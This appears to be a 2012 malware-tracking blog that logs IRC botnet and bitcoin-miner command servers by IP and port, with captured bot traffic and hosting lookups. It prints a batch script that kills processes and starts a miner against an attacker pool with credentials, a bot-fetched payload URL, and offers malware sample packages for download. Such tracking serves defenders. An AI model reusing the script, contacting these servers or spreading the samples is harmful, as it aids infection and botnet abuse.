Friday, February 24, 2012

119.59.99.52(irc botnet hosted in Thailand Bangkok 453 Ladplacout Jorakhaebua)

Remote Host Port Number
119.59.99.52 2345


NICK New[USA|00|P|33843]
PRIVMSG #!loco! :[M]: Thread Disabled.
PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.
USER XP-7233 * 0 :COMPUTERNAME
MODE New[USA|00|P|33843] -ix
JOIN #!loco!
PONG 22 MOTD


hosting infos:
http://whois.domaintools.com/119.59.99.52
Posted by Pig at 5:39 PM 0 comments

Thursday, February 23, 2012

sfx.dload.asia(BitMines-btc.miner.03 hosted in Germany Hetzner Online Ag)

Resolved : [sfx.dload.asia] To [176.9.42.247]
Resolved : [sfx.dload.asia] To [188.40.92.153]
Resolved : [sfx.dload.asia] To [188.40.93.82]

yz.bat:

ping -n 2 127.0.0.1
taskkill /f /im svchoost.exe
taskkill /f /im mamita.exe
taskkill /f /im x11811.exe
taskkill /f /im Winlogon2.exe
x30811.exe -a 60 -g yes -o http://sfx.dload.asia:8332/ -u redem_g -p x1x2x3x4x5 -t 2

file downloaded after login:
http://sfx.dload.asia:8332/ -u redem_g -p x1x2x3x4x5

{
"error": null,
"id": 1,
"result": {
"data": "0000000186cf398f9261a5ff927e6d18adca4547545736d46e5edd330000096900000000f951b83c75dc6965749a14107294a30bf191fb2a5cb98a27d97785ba7eadcbcc4f4696eb1a0c309c00000000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000080020000",
"hash1": "00000000000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000010000",
"midstate": "d19dc0137da0845ffb685769031b1a83a0744141a73f62cde6801a3b7ee5c748",
"target": "ffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000"
}
}

btcminer samples

Download
Download
Download
Download

hosting infos:
http://whois.domaintools.com/176.9.42.247
Posted by Pig at 8:59 PM 0 comments
Labels:

111.90.139.39(irc botnet hosted in Malaysia Johor Bahru Piradius Net)

Remote Host Port Number
111.90.139.39 1866

NICK n[USA|XP|COMPUTERNAME]fwkcgcf
USER hh "" "lol" :hh
JOIN #!h!
PONG 422

hosting infos:
http://whois.domaintools.com/111.90.139.39
Posted by Pig at 8:04 PM 0 comments

188.72.196.163(irc botnet hosted in Turkey Netdirect)

Remote Host Port Number
188.72.196.163 4244 PASS \google_cache2.tmp

NICK new[iRooT-XP-USA]572986
USER 5729 "" "TsGh" :5729
JOIN #!N!# WTF
PRIVMSG #!N!# :http://tips2x1.bloger.hr Has Been Visited!

Now talking in #!N!#
Topic On: [ #!N!# ] [ .visit http://tips2x1.bloger.hr ]
Topic By: [ NhG ]

hosting infos:
http://whois.domaintools.com/188.72.196.163
Posted by Pig at 7:30 PM 0 comments

46.166.140.132(ngrBot hosted in United States Amsterdam Santrex Internet Services Ltd)

Remote Host Port Number
199.15.234.7 80
46.166.140.132 6667

Clients: I have 112 clients and 0 servers
Local users: Current Local Users: 112 Max: 251
Global users: Current Global Users: 112 Max: 251

PONG :D5E8DE88
JOIN #|Bots|#
PONG :Vater.irc.mit.edu
NICK n{US|XP-32a}jxeicyv
USER jxeicyv 0 * :jxeicyv

Now talking in #|Bots|#
Joins: {HU|W7-64u}txhnliy [txhnliy@rox-7506984E.prtelecom.hu]
Modes On: [ #|Bots|# ] [ +st ]
Joins: {RO|W7-32a}vwsnywt [vwsnywt@D65A2BB1.7FC0B6F7.381F0948.IP 12]

hosting infos:
http://whois.domaintools.com/46.166.140.132
Posted by Pig at 6:59 PM 0 comments

Wednesday, February 22, 2012

big4eva.no-ip.biz(ngrBot hosted in Russian Federation Mir Telematiki Ltd)

Remote Host Port Number
46.17.98.235 6667

Clients: I have 73 clients and 0 servers
Local users: Current Local Users: 73 Max: 106
Global users: Current Global Users: 73 Max: 106

NICK SB|USA|XP|XHVDhcSI
USER SB|USA|XP|XHVDhcSI big4eva.no-ip.biz SB|USA|XP|XHVDhcSI :SB|USA|XP|XHVDhcSI
JOIN #irc
NICK SB|USA|XP|vxwfnfOz
USER SB|USA|XP|vxwfnfOz big4eva.no-ip.biz SB|USA|XP|vxwfnfOz :SB|USA|XP|vxwfnfOz

Now talking in ##xcn
Modes On: [ ##xcn ] [ + ]
Joins: {NL|W7u}twfqrwa [twfqrwa@rox-EB3BEE77.cm-5-8b.dynamic.ziggo.nl]

hosting infos:
http://whois.domaintools.com/46.17.98.235
Posted by Pig at 10:00 PM 0 comments

173.248.187.166(irc botnet hosted in United States Franklin Mddhosting Llc)

Remote Host Port Number
173.248.187.166 1866

The data identified by the following URLs was then requested from the remote web server:
http://dl.dropbox.com/u/55297842/visitweb.exe

NICK n[USA|XP|COMPUTERNAME]kvrizpu
USER hh "" "lol" :hh
JOIN #!g!
PONG 422

Now talking in #!g!
Topic On: [ #!g! ] [ .load /99/106/112/81/55/59/40/110/116/35/105/120/111/108/117/108/110/38/127/122/100/56/126/9/22/45/45/35/61/47/45/56/47/117/104/83/104/119/126/71/120/46/102/126/105/ ]
Topic By: [ evoL1x ]

hosting infos:
http://whois.domaintools.com/173.248.187.166
Posted by Pig at 5:23 PM 0 comments

Tuesday, February 21, 2012

120mb malware samples

This package contain alot of irc bots like ngrBot,Insomnia and banking trojans like Zeus,Spyeye but the best part of it are the files with the name FuckUPiggw.exe,FuckUPig.exe from one of my fans lol

Download
Download
Posted by Pig at 9:01 PM 0 comments
Labels:

Monday, February 20, 2012

217.160.253.201(irc botnet hosted in Germany 1&1 Internet Ag)

Remote Host Port Number
217.160.253.201 2345

NICK New[USA|00|P|78527]
PRIVMSG #!loco! :[M]: Thread Disabled.
PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.
USER XP-2736 * 0 :COMPUTERNAME
MODE New[USA|00|P|78527] -ix
JOIN #!loco!
PONG 22 MOTD

Now talking in #!loco!
Topic On: [ #!loco! ] [ .m.s|.m.e foto haaaha http://goo.gl/SgJrv?= ]
Topic By: [ wd69 ]

hosting infos:
http://whois.domaintools.com/217.160.253.201
Posted by Pig at 1:47 AM 0 comments

216.18.232.151(3vbot hosted in United States Allhostshop.com)

Remote Host Port Number
199.15.234.7 80
216.18.232.151 6667

NICK New{US-XP-x86}5635115
USER 5635115 "" "5635115" :5635115
MODE New{US-XP-x86}5635115 +iMm
JOIN #|3vbot|#
PONG :irc.priv8net.com
Posted by Pig at 1:35 AM 0 comments
Subscribe to: Posts (Atom)